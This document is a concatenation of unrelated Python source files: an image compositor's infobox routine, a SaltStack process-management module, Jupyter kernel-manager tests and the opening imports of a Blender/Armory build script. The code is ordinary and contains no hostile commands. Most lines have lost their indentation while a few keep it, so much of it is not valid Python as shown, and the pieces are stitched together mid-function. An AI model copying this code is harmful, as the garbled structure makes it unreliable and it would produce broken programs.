width = scale * self.INFOBOX_SIZE["default"][0]
width = int(np.ceil(width))
if height is not None or width is not None:
if height > y_res or width > x_res:
raise ImageCompositorError("Infobox is bigger than image.")
            elif (height < self.INFOBOX_SIZE["min"][1] or
                    width < self.INFOBOX_SIZE["min"][0]):
raise ImageCompositorError("Infobox is too small to read.")
sig = 3
textbox = np.zeros((height * sig, width * sig, 4), np.float32)
pt1 = (0, 0)
pt2 = (width * sig, height * sig)
color = (128, 128, 128, 128)
cv2.rectangle(textbox, pt1, pt2, color, cv2.FILLED)
org_date = (10 * sig, 40 * sig)
org_dist = (10 * sig, 70 * sig)
font = cv2.FONT_HERSHEY_COMPLEX_SMALL
font_size = 1.0 * sig
color = (255, 255, 255, 255)
date = str(metadata["date"])
dist = str(metadata["distance"])
cv2.putText(textbox, date, org_date, font, font_size, color, sig)
cv2.putText(textbox, dist, org_dist, font, font_size, color, sig)
# See link above for explanation
sigma = sig / 2.
kernel = int((4 * sigma + 0.5) * 2)
ksize = (kernel, kernel)
textbox = cv2.GaussianBlur(textbox, ksize, sigma)
textbox = cv2.resize(textbox, (width, height),
interpolation=cv2.INTER_AREA)
alpha_s = textbox[:, :, 3] / 255.0
alpha_l = 1. - alpha_s
for c in range(3):
tb_a = alpha_s * textbox[:, :, c]
img_a = alpha_l * img[y_res-height:y_res+1, x_res-width:x_res+1, c]
img_channel = (tb_a + img_a)
img[y_res-height:y_res+1, x_res-width:x_res+1, c] = img_channel
return img
def clip_color_depth(self, img):
"""Reduces color depth to the instrument color depth."""
max_val = int(2 ** self.inst.color_depth - 1)
if max_val <= 255:
img = img[:, :, 0:3] * max_val
img = img.astype(np.uint8)
else:
img = img[:, :, 0:3] * max_val
img = img.astype(np.uint16)
img = np.asarray(img * (65535. / max_val), np.float32)
img = img.astype(np.uint16)
return img
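def _clip_color_depth_sketch():
    """Hedged sketch (assumed 12-bit depth, toy pixel values, not used by the
    pipeline): shows how a normalised image is quantised to the instrument
    colour depth and stored in the full 16-bit range, mirroring
    ImageCompositor.clip_color_depth()."""
    max_val = 2 ** 12 - 1
    img = np.array([[[0.0] * 3, [0.5] * 3, [1.0] * 3]], dtype=np.float32)
    clipped = (img * max_val).astype(np.uint16)
    # rescale so the brightest value uses the top of the 16-bit range
    return np.asarray(clipped * (65535. / max_val), np.float32).astype(np.uint16)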
if __name__ == "__main__":
pass
|
process.py
|
# -*- coding: utf-8 -*-
# Import python libs
from __future__ import absolute_import, with_statement
import copy
import os
import sys
import time
import errno
import types
import signal
import logging
import threading
import contextlib
import subprocess
import multiprocessing
import multiprocessing.util
# Import salt libs
import salt.defaults.exitcodes
import salt.utils
import salt.log.setup
from salt.log.mixins import NewStyleClassMixIn
# Import 3rd-party libs
import salt.ext.six as six
from salt.ext.six.moves import queue, range # pylint: disable=import-error,redefined-builtin
from tornado import gen
log = logging.getLogger(__name__)
# pylint: disable=import-error
HAS_PSUTIL = False
try:
import psutil
HAS_PSUTIL = True
except ImportError:
pass
def systemd_notify_call(action):
process = subprocess.Popen(['systemd-notify', action], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
process.communicate()
status = process.poll()
return status == 0
def notify_systemd():
'''
Notify systemd that this process has started
'''
try:
import systemd.daemon
except ImportError:
if salt.utils.which('systemd-notify') and systemd_notify_call('--booted'):
return systemd_notify_call('--ready')
return False
if systemd.daemon.booted():
try:
return systemd.daemon.notify('READY=1')
except SystemError:
# Daemon was not started by systemd
pass
def set_pidfile(pidfile, user):
'''
Save the pidfile
'''
pdir = os.path.dirname(pidfile)
if not os.path.isdir(pdir) and pdir:
os.makedirs(pdir)
try:
with salt.utils.fopen(pidfile, 'w+') as ofile:
ofile.write(str(os.getpid()))
except IOError:
pass
log.debug(('Created pidfile: {0}').format(pidfile))
if salt.utils.is_windows():
return True
import pwd # after confirming not running Windows
#import grp
try:
pwnam = pwd.getpwnam(user)
uid = pwnam[2]
gid = pwnam[3]
#groups = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
except IndexError:
sys.stderr.write(
'Failed to set the pid to user: {0}. The user is not '
'available.\n'.format(
user
)
)
sys.exit(salt.defaults.exitcodes.EX_NOUSER)
if os.getuid() == uid:
# The current user already owns the pidfile. Return!
return
try:
os.chown(pidfile, uid, gid)
except OSError as err:
msg = (
'Failed to set the ownership of PID file {0} to user {1}.'.format(
pidfile, user
)
)
log.debug('{0} Traceback follows:\n'.format(msg), exc_info=True)
sys.stderr.write('{0}\n'.format(msg))
sys.exit(err.errno)
log.debug('Chowned pidfile: {0} to user: {1}'.format(pidfile, user))
def check_pidfile(pidfile):
'''
Determine if a pidfile has been written out
'''
return os.path.isfile(pidfile)
def get_pidfile(pidfile):
'''
Return the pid from a pidfile as an integer
'''
with salt.utils.fopen(pidfile) as pdf:
pid = pdf.read()
return int(pid)
def clean_proc(proc, wait_for_kill=10):
'''
Generic method for cleaning up multiprocessing procs
'''
# NoneType and other fun stuff need not apply
if not proc:
return
try:
waited = 0
while proc.is_alive():
proc.terminate()
waited += 1
time.sleep(0.1)
if proc.is_alive() and (waited >= wait_for_kill):
log.error(
'Process did not die with terminate(): {0}'.format(
proc.pid
)
)
os.kill(proc.pid, signal.SIGKILL)
except (AssertionError, AttributeError):
# Catch AssertionError when the proc is evaluated inside the child
# Catch AttributeError when the process dies between proc.is_alive()
# and proc.terminate() and turns into a NoneType
pass
def os_is_running(pid):
'''
Use OS facilities to determine if a process is running
'''
if isinstance(pid, six.string_types):
pid = int(pid)
if HAS_PSUTIL:
return psutil.pid_exists(pid)
else:
try:
os.kill(pid, 0) # SIG 0 is the "are you alive?" signal
return True
except OSError:
return False
class ThreadPool(object):
    '''
    This is a very, VERY basic threadpool implementation.
    It was made instead of using multiprocessing's ThreadPool because we want
    to set a max queue size and we want to daemonize threads (neither is
    exposed in the stdlib version).
    Since there isn't much use for this class as of right now, this
    implementation only supports daemonized threads and will *not* return
    results.
    TODO: if this is found to be more generally useful it would be nice to pull
    in the majority of code from upstream or from http://bit.ly/1wTeJtM
    '''
def __init__(self,
num_threads=None,
queue_size=0):
# if no count passed, default to number of CPUs
if num_threads is None:
num_threads = multiprocessing.cpu_count()
self.num_threads = num_threads
# create a task queue of queue_size
self._job_queue = queue.Queue(queue_size)
self._workers = []
# create worker threads
for _ in range(num_threads):
thread = threading.Thread(target=self._thread_target)
thread.daemon = True
thread.start()
self._workers.append(thread)
# intentionally not called "apply_async" since we aren't keeping track of
# the return at all, if we want to make this API compatible with multiprocessing
# threadpool we can in the future, and we won't have to worry about name collision
def fire_async(self, func, args=None, kwargs=None):
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
self._job_queue.put_nowait((func, args, kwargs))
return True
except queue.Full:
return False
def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die within 1s
try:
try:
func, args, kwargs = self._job_queue.get(timeout=1)
self._job_queue.task_done() # Mark the task as done once we get it
except queue.Empty:
continue
except AttributeError:
                # During shutdown, `queue` may not have an `Empty` attribute. Thus,
# we have to catch a possible exception from our exception handler in
# order to avoid an unclean shutdown. Le sigh.
continue
try:
log.debug('ThreadPool executing func: {0} with args:{1}'
' kwargs{2}'.format(func, args, kwargs))
func(*args, **kwargs)
except Exception as err:
log.debug(err, exc_info=True)
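def _threadpool_usage_sketch():
    # Hedged usage sketch (illustrative only, not part of Salt): queue a
    # fire-and-forget job on a small pool; fire_async() returns False when the
    # bounded queue is already full.
    pool = ThreadPool(num_threads=2, queue_size=10)
    return pool.fire_async(log.debug, args=['hello from the thread pool'])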
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
self._restart_processes = True
def add_process(self, tgt, args=None, kwargs=None, name=None):
'''
        Create a process with the given args and kwargs.
        This will determine if it is a Process class, otherwise it assumes
        it is a function.
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if salt.utils.is_windows():
            # Need to ensure that 'log_queue' is correctly transferred to
# processes that inherit from 'MultiprocessingProcess'.
if type(MultiprocessingProcess) is type(tgt) and (
issubclass(tgt, MultiprocessingProcess)):
need_log_queue = True
else:
need_log_queue = False
if need_log_queue and 'log_queue' not in kwargs:
if hasattr(self, 'log_queue'):
kwargs['log_queue'] = self.log_queue
else:
kwargs['log_queue'] = (
salt.log.setup.get_multiprocessing_logging_queue())
# create a nicer name for the debug log
if name is None:
if isinstance(tgt, types.FunctionType):
name = '{0}.{1}'.format(
tgt.__module__,
tgt.__name__,
)
else:
name = '{0}{1}.{2}'.format(
tgt.__module__,
'.{0}'.format(tgt.__class__) if str(tgt.__class__) != "<type 'type'>" else '',
tgt.__name__,
)
if type(multiprocessing.Process) is type(tgt) and issubclass(tgt, multiprocessing.Process):
process = tgt(*args, **kwargs)
else:
process = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs, name=name)
if isinstance(process, SignalHandlingMultiprocessingProcess):
with default_signals(signal.SIGINT, signal.SIGTERM):
process.start()
else:
process.start()
log.debug("Started '{0}' with pid {1}".format(name, process.pid))
self._process_map[process.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': process}
return process
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info('Process {0} ({1}) died with exit status {2},'
' restarting...'.format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def stop_restarting(self):
self._restart_processes = False
def send_signal_to_processes(self, signal):
for pid in six.iterkeys(self._process_map.copy()):
try:
os.kill(pid, signal)
except OSError as exc:
if exc.errno != errno.ESRCH:
# If it's not a "No such process" error, raise it
raise
# Otherwise, it's a dead process, remove it from the process map
del self._process_map[pid]
@gen.coroutine
    def run(self, asynchronous=False):  # 'async' is a reserved word in Python 3
'''
Load and start all available api modules
'''
log.debug('Process Manager starting!')
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
            # There is no SIGTERM handler installed, install ours
signal.signal(signal.SIGTERM, self.kill_children)
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
            # There is no SIGINT handler installed, install ours
signal.signal(signal.SIGINT, self.kill_children)
while True:
log.debug('Process manager iteration')
try:
# in case someone died while we were waiting...
self.check_children()
                if not salt.utils.is_windows() and not asynchronous:
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug('Process of pid {0} died, not a known'
' process, will not restart'.format(pid))
continue
self.restart_process(pid)
                elif asynchronous is True:
yield gen.sleep(10)
                elif asynchronous is False:
# os.wait() is not supported on Windows.
time.sleep(10)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
if self._restart_processes is True:
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args, **kwargs):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
        # handler; if we are in a child, let's just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
if salt.utils.is_windows():
with open(os.devnull, 'wb') as devnull:
for pid, p_map in six.iteritems(self._process_map):
# On Windows, we need to explicitly terminate sub-processes
# because the processes don't have a sigterm handler.
subprocess.call(
['taskkill', '/F', '/T', '/PID', str(pid)],
stdout=devnull, stderr=devnull
)
p_map['Process'].terminate()
else:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Terminating pid {0}: {1}'.format(pid, p_map['Process']))
if args:
# escalate the signal to the process
os.kill(pid, args[0])
try:
p_map['Process'].terminate()
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
if not p_map['Process'].is_alive():
try:
del self._process_map[pid]
except KeyError:
# Race condition
pass
end_time = time.time() + self.wait_for_kill # when to die
log.trace('Waiting to kill process manager children')
while self._process_map and time.time() < end_time:
for pid, p_map in six.iteritems(self._process_map.copy()):
log.trace('Joining pid {0}: {1}'.format(pid, p_map['Process']))
p_map['Process'].join(0)
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
# if any managed processes still remain to be handled, let's kill them
kill_iterations = 2
while kill_iterations >= 0:
kill_iterations -= 1
for pid, p_map in six.iteritems(self._process_map.copy()):
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
continue
log.trace('Killing pid {0}: {1}'.format(pid, p_map['Process']))
try:
                    os.kill(pid, signal.SIGKILL)
except OSError:
# in case the process has since decided to die, os.kill returns OSError
if not p_map['Process'].is_alive():
# The process is no longer alive, remove it from the process map dictionary
try:
del self._process_map[pid]
except KeyError:
# This is a race condition if a signal was passed to all children
pass
if self._process_map:
# Some processes disrespected the KILL signal!!!!
available_retries = kwargs.get('retry', 3)
if available_retries >= 0:
log.info(
'Some processes failed to respect the KILL signal: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.info('kill_children retries left: %s', available_retries)
kwargs['retry'] = available_retries - 1
return self.kill_children(*args, **kwargs)
else:
log.warning(
'Failed to kill the following processes: %s',
'; '.join(
'Process: {0} (Pid: {1})'.format(v['Process'], k) for
(k, v) in self._process_map.items()
)
)
log.warning(
'Salt will either fail to terminate now or leave some '
'zombie processes behind'
)
class MultiprocessingProcess(multiprocessing.Process, NewStyleClassMixIn):
def __new__(cls, *args, **kwargs):
instance = super(MultiprocessingProcess, cls).__new__(cls)
# Patch the run method at runtime because decorating the run method
# with a function with a similar behavior would be ignored once this
        # class's run method is overridden.
instance._original_run = instance.run
instance.run = instance._run
return instance
def __init__(self, *args, **kwargs):
if (salt.utils.is_windows() and
not hasattr(self, '_is_child') and
self.__setstate__.__code__ is
MultiprocessingProcess.__setstate__.__code__):
# On Windows, if a derived class hasn't defined __setstate__, that
# means the 'MultiprocessingProcess' version will be used. For this
# version, save a copy of the args and kwargs to use with its
# __setstate__ and __getstate__.
# We do this so that __init__ will be invoked on Windows in the
# child process so that a register_after_fork() equivalent will
# work on Windows. Note that this will only work if the derived
# class uses the exact same args and kwargs as this class. Hence
# this will also work for 'SignalHandlingMultiprocessingProcess'.
# However, many derived classes take params that they don't pass
# down (eg opts). Those classes need to override __setstate__ and
# __getstate__ themselves.
self._args_for_getstate = copy.copy(args)
self._kwargs_for_getstate = copy.copy(kwargs)
self.log_queue = kwargs.pop('log_queue', None)
if self.log_queue is None:
self.log_queue = salt.log.setup.get_multiprocessing_logging_queue()
else:
# Set the logging queue so that it can be retrieved later with
# salt.log.setup.get_multiprocessing_logging_queue().
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
# Call __init__ from 'multiprocessing.Process' only after removing
# 'log_queue' from kwargs.
super(MultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
# On Windows, the multiprocessing.Process object is reinitialized
# in the child process via the constructor. Due to this, methods
# such as ident() and is_alive() won't work properly. So we use
# our own creation '_is_child' for this purpose.
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_process_logging() directly.
self.__setup_process_logging()
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
else:
multiprocessing.util.register_after_fork(
self,
MultiprocessingProcess.__setup_process_logging
)
multiprocessing.util.Finalize(
self,
salt.log.setup.shutdown_multiprocessing_logging,
exitpriority=16
)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
args = state['args']
kwargs = state['kwargs']
# This will invoke __init__ of the most derived class.
self.__init__(*args, **kwargs)
def __getstate__(self):
args = self._args_for_getstate
kwargs = self._kwargs_for_getstate
if 'log_queue' not in kwargs:
kwargs['log_queue'] = self.log_queue
# Remove the version of these in the parent process since
# they are no longer needed.
del self._args_for_getstate
del self._kwargs_for_getstate
return {'args': args,
'kwargs': kwargs}
def __setup_process_logging(self):
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
def _run(self):
try:
return self._original_run()
except SystemExit:
# These are handled by multiprocessing.Process._bootstrap()
raise
except Exception as exc:
log.error(
'An un-handled exception from the multiprocessing process '
'\'%s\' was caught:\n', self.name, exc_info=True)
# Re-raise the exception. multiprocessing.Process will write it to
# sys.stderr and set the proper exitcode and we have already logged
# it above.
raise
class SignalHandlingMultiprocessingProcess(MultiprocessingProcess):
def __init__(self, *args, **kwargs):
super(SignalHandlingMultiprocessingProcess, self).__init__(*args, **kwargs)
if salt.utils.is_windows():
if hasattr(self, '_is_child'):
# On Windows, no need to call register_after_fork().
# register_after_fork() would only work on Windows if called
# from the child process anyway. Since we know this is the
# child process, call __setup_signals() directly.
self.__setup_signals()
else:
multiprocessing.util.register_after_fork(
self,
SignalHandlingMultiprocessingProcess.__setup_signals
)
def __setup_signals(self):
signal.signal(signal.SIGINT, self._handle_signals)
signal.signal(signal.SIGTERM, self._handle_signals)
def _handle_signals(self, signum, sigframe):
msg = '{0} received a '.format(self.__class__.__name__)
if signum == signal.SIGINT:
msg += 'SIGINT'
elif signum == signal.SIGTERM:
msg += 'SIGTERM'
msg += '. Exiting'
log.debug(msg)
exit(salt.defaults.exitcodes.EX_OK)
def start(self):
with default_signals(signal.SIGINT, signal.SIGTERM):
super(SignalHandlingMultiprocessingProcess, self).start()
@contextlib.contextmanager
def default_signals(*signals):
old_signals = {}
for signum in signals:
old_signals[signum] = signal.getsignal(signum)
signal.signal(signum, signal.SIG_DFL)
# Do whatever is needed with the reset signals
yield
# Restore signals
for signum in old_signals:
signal.signal(signum, old_signals[signum])
del old_signals
|
test_kernelmanager.py
|
"""Tests for the KernelManager"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import asyncio
import json
import os
pjoin = os.path.join
import signal
from subprocess import PIPE
import sys
import time
import threading
import multiprocessing as mp
import pytest
from unittest import TestCase
from tornado.testing import AsyncTestCase, gen_test, gen
from traitlets.config.loader import Config
from jupyter_core import paths
from jupyter_client import KernelManager, AsyncKernelManager
from ..manager import start_new_kernel, start_new_async_kernel
from .utils import test_env, skip_win32
TIMEOUT = 30
class TestKernelManager(TestCase):
def setUp(self):
self.env_patch = test_env()
self.env_patch.start()
def tearDown(self):
self.env_patch.stop()
def _install_test_kernel(self):
kernel_dir = pjoin(paths.jupyter_data_dir(), 'kernels', 'signaltest')
os.makedirs(kernel_dir)
with open(pjoin(kernel_dir, 'kernel.json'), 'w') as f:
f.write(json.dumps({
'argv': [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}'],
'display_name': "Signal Test Kernel",
'env': {'TEST_VARS': '${TEST_VARS}:test_var_2'},
}))
def _get_tcp_km(self):
c = Config()
km = KernelManager(config=c)
return km
def _get_ipc_km(self):
c = Config()
c.KernelManager.transport = 'ipc'
c.KernelManager.ip = 'test'
km = KernelManager(config=c)
return km
def _run_lifecycle(self, km):
km.start_kernel(stdout=PIPE, stderr=PIPE)
self.assertTrue(km.is_alive())
km.restart_kernel(now=True)
self.assertTrue(km.is_alive())
km.interrupt_kernel()
self.assertTrue(isinstance(km, KernelManager))
km.shutdown_kernel(now=True)
self.assertTrue(km.context.closed)
def test_tcp_lifecycle(self):
km = self._get_tcp_km()
self._run_lifecycle(km)
@skip_win32
def test_ipc_lifecycle(self):
km = self._get_ipc_km()
self._run_lifecycle(km)
def test_get_connect_info(self):
km = self._get_tcp_km()
cinfo = km.get_connection_info()
keys = sorted(cinfo.keys())
expected = sorted([
'ip', 'transport',
'hb_port', 'shell_port', 'stdin_port', 'iopub_port', 'control_port',
'key', 'signature_scheme',
])
self.assertEqual(keys, expected)
@skip_win32
def test_signal_kernel_subprocesses(self):
self._install_test_kernel()
km, kc = start_new_kernel(kernel_name='signaltest')
def execute(cmd):
kc.execute(cmd)
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
return content
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
N = 5
for i in range(N):
execute("start")
time.sleep(1) # make sure subprocs stay up
reply = execute('check')
self.assertEqual(reply['user_expressions']['poll'], [None] * N)
# start a job on the kernel to be interrupted
kc.execute('sleep')
time.sleep(1) # ensure sleep message has been handled before we interrupt
km.interrupt_kernel()
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
self.assertEqual(content['user_expressions']['interrupted'], True)
# wait up to 5s for subprocesses to handle signal
for i in range(50):
reply = execute('check')
if reply['user_expressions']['poll'] != [-signal.SIGINT] * N:
time.sleep(0.1)
else:
break
# verify that subprocesses were interrupted
self.assertEqual(reply['user_expressions']['poll'], [-signal.SIGINT] * N)
def test_start_new_kernel(self):
self._install_test_kernel()
km, kc = start_new_kernel(kernel_name='signaltest')
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
self.assertTrue(km.is_alive())
self.assertTrue(kc.is_alive())
self.assertFalse(km.context.closed)
def _env_test_body(self, kc):
def execute(cmd):
kc.execute(cmd)
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
return content
reply = execute('env')
self.assertIsNotNone(reply)
self.assertEqual(reply['user_expressions']['env'], 'test_var_1:test_var_2')
def test_templated_kspec_env(self):
self._install_test_kernel()
km, kc = start_new_kernel(kernel_name='signaltest')
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
self.assertTrue(km.is_alive())
self.assertTrue(kc.is_alive())
self.assertFalse(km.context.closed)
self._env_test_body(kc)
def _start_kernel_with_cmd(self, kernel_cmd, extra_env, **kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name='signaltest')
km.kernel_cmd = kernel_cmd
km.extra_env = extra_env
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=60)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def test_templated_extra_env(self):
self._install_test_kernel()
kernel_cmd = [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}']
extra_env = {'TEST_VARS': '${TEST_VARS}:test_var_2'}
km, kc = self._start_kernel_with_cmd(kernel_cmd, extra_env)
self.addCleanup(kc.stop_channels)
self.addCleanup(km.shutdown_kernel)
self.assertTrue(km.is_alive())
self.assertTrue(kc.is_alive())
self.assertFalse(km.context.closed)
self._env_test_body(kc)
def test_cleanup_context(self):
km = KernelManager()
self.assertIsNotNone(km.context)
km.cleanup_resources(restart=False)
self.assertTrue(km.context.closed)
def test_no_cleanup_shared_context(self):
"""kernel manager does not terminate shared context"""
import zmq
ctx = zmq.Context()
km = KernelManager(context=ctx)
self.assertEqual(km.context, ctx)
self.assertIsNotNone(km.context)
km.cleanup_resources(restart=False)
self.assertFalse(km.context.closed)
self.assertFalse(ctx.closed)
ctx.term()
class TestParallel:
@pytest.fixture(autouse=True)
def env(self):
env_patch = test_env()
env_patch.start()
yield
env_patch.stop()
@pytest.fixture(params=['tcp', 'ipc'])
def transport(self, request):
return request.param
@pytest.fixture
def config(self, transport):
c = Config()
c.transport = transport
if transport == 'ipc':
c.ip = 'test'
return c
def _install_test_kernel(self):
kernel_dir = pjoin(paths.jupyter_data_dir(), 'kernels', 'signaltest')
os.makedirs(kernel_dir)
with open(pjoin(kernel_dir, 'kernel.json'), 'w') as f:
f.write(json.dumps({
'argv': [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}'],
'display_name': "Signal Test Kernel",
}))
def test_start_sequence_kernels(self, config):
"""Ensure that a sequence of kernel startups doesn't break anything."""
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
self._run_signaltest_lifecycle(config)
self._run_signaltest_lifecycle(config)
def test_start_parallel_thread_kernels(self, config):
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
thread = threading.Thread(target=self._run_signaltest_lifecycle, args=(config,))
thread2 = threading.Thread(target=self._run_signaltest_lifecycle, args=(config,))
try:
thread.start()
thread2.start()
finally:
thread.join()
thread2.join()
def test_start_parallel_process_kernels(self, config):
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
thread = threading.Thread(target=self._run_signaltest_lifecycle, args=(config,))
proc = mp.Process(target=self._run_signaltest_lifecycle, args=(config,))
try:
thread.start()
proc.start()
finally:
thread.join()
proc.join()
assert proc.exitcode == 0
def test_start_sequence_process_kernels(self, config):
self._install_test_kernel()
self._run_signaltest_lifecycle(config)
proc = mp.Process(target=self._run_signaltest_lifecycle, args=(config,))
try:
proc.start()
finally:
proc.join()
assert proc.exitcode == 0
def _prepare_kernel(self, km, startup_timeout=TIMEOUT, **kwargs):
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return kc
def _run_signaltest_lifecycle(self, config=None):
km = KernelManager(config=config, kernel_name='signaltest')
kc = self._prepare_kernel(km, stdout=PIPE, stderr=PIPE)
def execute(cmd):
kc.execute(cmd)
reply = kc.get_shell_msg(TIMEOUT)
content = reply['content']
assert content['status'] == 'ok'
return content
execute("start")
assert km.is_alive()
execute('check')
assert km.is_alive()
km.restart_kernel(now=True)
assert km.is_alive()
execute('check')
km.shutdown_kernel()
assert km.context.closed
class TestAsyncKernelManager(AsyncTestCase):
def setUp(self):
super(TestAsyncKernelManager, self).setUp()
self.env_patch = test_env()
self.env_patch.start()
def tearDown(self):
super(TestAsyncKernelManager, self).tearDown()
self.env_patch.stop()
def _install_test_kernel(self):
kernel_dir = pjoin(paths.jupyter_data_dir(), 'kernels', 'signaltest')
os.makedirs(kernel_dir)
with open(pjoin(kernel_dir, 'kernel.json'), 'w') as f:
f.write(json.dumps({
'argv': [sys.executable,
'-m', 'jupyter_client.tests.signalkernel',
'-f', '{connection_file}'],
'display_name': "Signal Test Kernel",
}))
def _get_tcp_km(self):
c = Config()
km = AsyncKernelManager(config=c)
return km
def _get_ipc_km(self):
c = Config()
c.KernelManager.transport = 'ipc'
c.KernelManager.ip = 'test'
km = AsyncKernelManager(config=c)
return km
async def _run_lifecycle(self, km):
await km.start_kernel(stdout=PIPE, stderr=PIPE)
self.assertTrue(await km.is_alive())
await km.restart_kernel(now=True)
self.assertTrue(await km.is_alive())
await km.interrupt_kernel()
self.assertTrue(isinstance(km, AsyncKernelManager))
await km.shutdown_kernel(now=True)
self.assertFalse(await km.is_alive())
self.assertTrue(km.context.closed)
@gen_test
async def test_tcp_lifecycle(self):
km = self._get_tcp_km()
await self._run_lifecycle(km)
@skip_win32
@gen_test
async def test_ipc_lifecycle(self):
km = self._get_ipc_km()
await self._run_lifecycle(km)
def test_get_connect_info(self):
km = self._get_tcp_km()
cinfo = km.get_connection_info()
keys = sorted(cinfo.keys())
expected = sorted([
'ip', 'transport',
'hb_port', 'shell_port', 'stdin_port', 'iopub_port', 'control_port',
'key', 'signature_scheme',
])
self.assertEqual(keys, expected)
@skip_win32
@gen_test(timeout=10.0)
async def test_signal_kernel_subprocesses(self):
self._install_test_kernel()
km, kc = await start_new_async_kernel(kernel_name='signaltest')
async def execute(cmd):
kc.execute(cmd)
reply = await kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
return content
# Ensure that shutdown_kernel and stop_channels are called at the end of the test.
# Note: we cannot use addCleanup(<func>) for these since it doesn't properly handle
# coroutines - which km.shutdown_kernel now is.
try:
N = 5
for i in range(N):
await execute("start")
await asyncio.sleep(1) # make sure subprocs stay up
reply = await execute('check')
self.assertEqual(reply['user_expressions']['poll'], [None] * N)
# start a job on the kernel to be interrupted
kc.execute('sleep')
await asyncio.sleep(1) # ensure sleep message has been handled before we interrupt
await km.interrupt_kernel()
reply = await kc.get_shell_msg(TIMEOUT)
content = reply['content']
self.assertEqual(content['status'], 'ok')
self.assertEqual(content['user_expressions']['interrupted'], True)
# wait up to 5s for subprocesses to handle signal
for i in range(50):
reply = await execute('check')
if reply['user_expressions']['poll'] != [-signal.SIGINT] * N:
await asyncio.sleep(0.1)
else:
break
# verify that subprocesses were interrupted
self.assertEqual(reply['user_expressions']['poll'], [-signal.SIGINT] * N)
finally:
await km.shutdown_kernel(now=True)
kc.stop_channels()
self.assertTrue(km.context.closed)
@gen_test(timeout=10.0)
async def test_start_new_async_kernel(self):
self._install_test_kernel()
km, kc = await start_new_async_kernel(kernel_name='signaltest')
# Ensure that shutdown_kernel and stop_channels are called at the end of the test.
# Note: we cannot use addCleanup(<func>) for these since it doesn't properly handle
# coroutines - which km.shutdown_kernel now is.
try:
self.assertTrue(await km.is_alive())
self.assertTrue(await kc.is_alive())
finally:
await km.shutdown_kernel(now=True)
kc.stop_channels()
self.assertTrue(km.context.closed)
|
make.py
|
import os
import glob
import time
import shutil
import bpy
import json
import stat
from bpy.props import *
import subprocess
import threading
import webbrowser
import arm.utils
import arm.write_data as write_data
import arm.make_logic as make_logic
